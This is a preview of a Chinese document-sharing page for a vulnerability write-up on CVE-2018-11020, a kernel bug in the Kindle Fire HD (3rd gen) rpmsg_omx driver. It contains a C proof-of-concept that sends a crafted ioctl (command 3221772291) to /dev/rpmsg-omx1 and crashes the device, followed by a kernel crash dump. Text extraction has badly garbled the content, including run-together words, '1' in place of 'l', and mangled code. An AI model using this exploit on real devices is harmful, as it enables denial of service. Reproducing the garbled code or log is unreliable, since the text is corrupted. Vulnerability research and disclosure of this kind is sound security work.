（CVE-2018-11020）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx

上传人：lao****ou

文档编号：794871

上传时间：2024-05-25

格式：DOCX

页数：10

大小：37.99KB

《（CVE-2018-11020）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享，可在线阅读，更多相关《（CVE-2018-11020）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx（10页珍藏版）》请在第一文库网上搜索。

1、(CVE-2018-11020)AmazonKind1eFireHD(3rd)FireOSkerne1组件安全漏洞一、漏洞简介AmazonKind1eFireHD(3rd)FireOS4.5.5.3内核组件中的内核模块omapdriversrpmsgrpmsg_omx.c允许攻击者通过设备文件/dev/rpmsg上的ioct1的参数注入特制的参数使用命令3221772291的omx1,并导致内核崩溃。要探索此漏洞，必须打开设备文件devrpmsg-omx1,并使用命令3221772291和精心设计的有效负载作为第三个参数来对该设备文件进行ioct1系统调用。二、漏洞影响FireOS4.5.5.

2、3三、复现过程poc/* ThisispocofKind1eFireHD3rd* Abugintheioct1interfaceofdevicefi1edevrpmsg-omx1causesthesystemcrashviaIOCT13221772291.* Re1atedbuggystructnameisgcicommit.* ThisPocshou1drunwithpermissiontodoioct1ondevrpmsg-om1.* Thefow11wingiskmsgofkerne1crashinfomation:*/#inc1ude#inc1ude#inc1ude#inc1udeco

3、nststaticchar*driver=devrpmsg-omx1;staticcommand=3221772291;intmain(intargc,char*argv,char*env)unsignedintpay1oad=0xb5d18de2,0f6e48a17j09179c429,089a32e03;intfd=0;fd=open(driverjO_RDWR);if(fddata1oca1tmp1og);return-1;printf(Tryopen%swithcommand0%x.n,driver,command);printf(Systemwi11crashandreboot.n)

4、;if(ioct1(fdjcommand,Spay1oad)/data/IOCaItmp1og);return-1;c1ose(fd);return0；崩溃日志146.290710Unab1etohand1ekerne1pagingrequestatvirtua1addressb5d18de6146.299438pgd=d72dc000146.302795b5d18de6*pgd=00000000146.307281Interna1error:Oops:5#1PREEMPTSMPARM146.313232Modu1es1inkedin:omap1fb(0)pvrsrvkm(O)pvr_1ogg

5、en(0)146.320983CPU:0Tainted:GO(3.4.83-gd2afc0bae69#1)146.328308PCisation_free+0xc0xb4146.3326721Risatrpmsg_omx_ioct1+0x2cc/0x598146.337890pc:Ir:psr:60000013146.337890sp:c35b5e60ip:c35b5e80fp:c35b5e7c146.350860r10:c35b5ea8r9:de88c4d8r8:c35b4000f8146.356872r7:dd32b580r6：00000003r5:d71d5880r4:be92f5001

6、46.364135r3:d71d58ecr2:d71d58ecr1:b5d18de2r0:d7aaaa146.371551F1ags:nZCvIRQsonFIQsonModeSVC_32ISAARMSegmentuser146.379516Contro1:10c5387dTab1e:972dc04aDAC:00000015146.386077146.386077PC：0xc02e84c0:146.39105284c00a000001058e2433001e5853058e2871010ebfddc25e1a00006eb0ee904e5953146.40158084e0e353000003fe

7、285005ce5933cba000011Ia0009e1a0200de3c23d7fe3c33146.4122928500e593723c006eb0ee876e1a00005e1a01007ebf90a76e597321ce585306ce1a00146.4228218520ebffffb400de92dd878e24cb004e1a00004ebf8e011e89da8f0e7f001f2e1a0c146.4335028540e5915004006eb0ee8e2e5953010e1a04001e15500001a000021e2856014e1a00146.4441838560e353

8、0000008e353000090a000005e243200ce15400022a00000ae5933146.4548648580e59f0054e3001219006eb0ee856e89da878e59f2050e59f3050ebf58268e1a00146.46539385a0859330048affffedf93e3320000Iafffffa146.476074146.4760741R:0c048a0a0:f57ff05fe1943f9fe2433001e1842146.481048a0a033a03000e3530000008e1a0000aebf7305eIaffffaee

9、24ba05ce1a01004e3a02146.491729a0c0e3500000Iaffffaa000e50b005c0a000001e5950068e51b1058ebf97677e3500146.502380a0e0e3700a019affffc8018eaffff8ee1a00004e3a03000e50b305ceaffffc5e3e00146.513061a100e1a0100ae3a02008fc2e5950068ebf97904ebf73154e35000000affff88eafff146.523590a120eaffffb9e24b005c03ce1a03006e58d2

10、000e3a01030ebf7398be3a02030e5970146.534240a140e59f1280e59f2274004e7933101e3530000ebf99069e3e0000deaffff78e5933146.544921a1600affff6ce5950068a018a00001fe5950068ebf97651e25090000a000021e3790146.555603a180e1a01009e24b206405c0affff9be59f322c146.566131146.566131SP:0xc35b5de0:e24b3060ebf97447e3500000050b9

11、146.5712285de000000004d8cc50f454060000013ffffffff600100130000000100000001c02e8146.5817875e00c35b5e4cc35b4000370d7aaaa00b5d18de2c35b5e7cc35b5e18C06a5318C0008146.5924375e20d71d58ecd71d58ec580c35b4000de88c4d8be92f5f8d71d588000000003dd32b146.6031185e40c35b5ea8c35b5e7c54060000013ffffffffc35b5e80c35b5e60C

12、048a120C02e8146.6138305e60d71d58ecbe92f5f8e80C048a120C02e8540d71d588000000003c35b5f04c35b5146.6243895e80c35b5edcc35b5e90e40c35b5ed4c35b5ea8C0207454C00bd9200000001ed7333146.6350705ea0C00723a0000fffff00100000000C35b5f14b5d18de2f6e48a170000000200000146.6455995ec00000000000000001ee0c02089fc00000000146.6

13、56158146.656158IP:0xc35b5e00:de88c4d8c25d7c00c35b5efcc35b5146.6612545e00c35b5e4cc35b4000370d7aaaa00b5d18de2c35b5e7cc35b5e18C06a5318C0008146.6719365e20d71d58ecd71d58ec580c35b4000de88c4d8be92f5f8d71d588000000003dd32b146.6824955e40c35b5ea8c35b5e7c54060000013ffffffffc35b5e80c35b5e60C048a120C02e8146.6931

14、765e60d71d58ecbe92f5f8d71d588000000003c35b5f04c35b5e80C048a120C02e8540146.703704Se80c35b5edcc35b5e90e40c35b5ed4c35b5ea8C0207454C00bd9200000001ed7333146.7142635ea0C00723a0000fffff00100000000c35b5f14b5d18de2f6e48a170000000200000146.7249145ec00000000000000001ee0c02089fc00000000de88c4d8c25d7c00c35b5efcc35b5146.7355955ee0d72400c000000004000C35b5f74C35b

文档加载中……请稍候！
如果长时间未打开，您也可以点击刷新试试。

下载文档到电脑，查找使用更方便

3 金币 0人已下载

下载	加入VIP,免费下载

版权申诉 word格式文档无特别注明外均可编辑修改；预览文档经过压缩，下载后原文更清晰！ 立即下载

配套讲稿：: 如PPT文件的首页显示word图标，表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
特殊限制：: 部分文档作品中含有的国旗、国徽等图片，仅作为作品整体效果示例展示，禁止商用。设计者仅对作品中独创性部分享有著作权。
关键词：: CVE-2018-11020Amazon Kindle Fire HD 3rd OS kernel组件安全漏洞 CVE 2018 11020 Amazon rd kernel 组件安全漏洞

第一文库网所有资源均是用户自行上传分享，仅供网友学习交流，未经上传用户书面授权，请勿作他用。

关于本文

本文标题：（CVE-2018-11020）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx
链接地址：https://www.001doc.com/doc/794871.html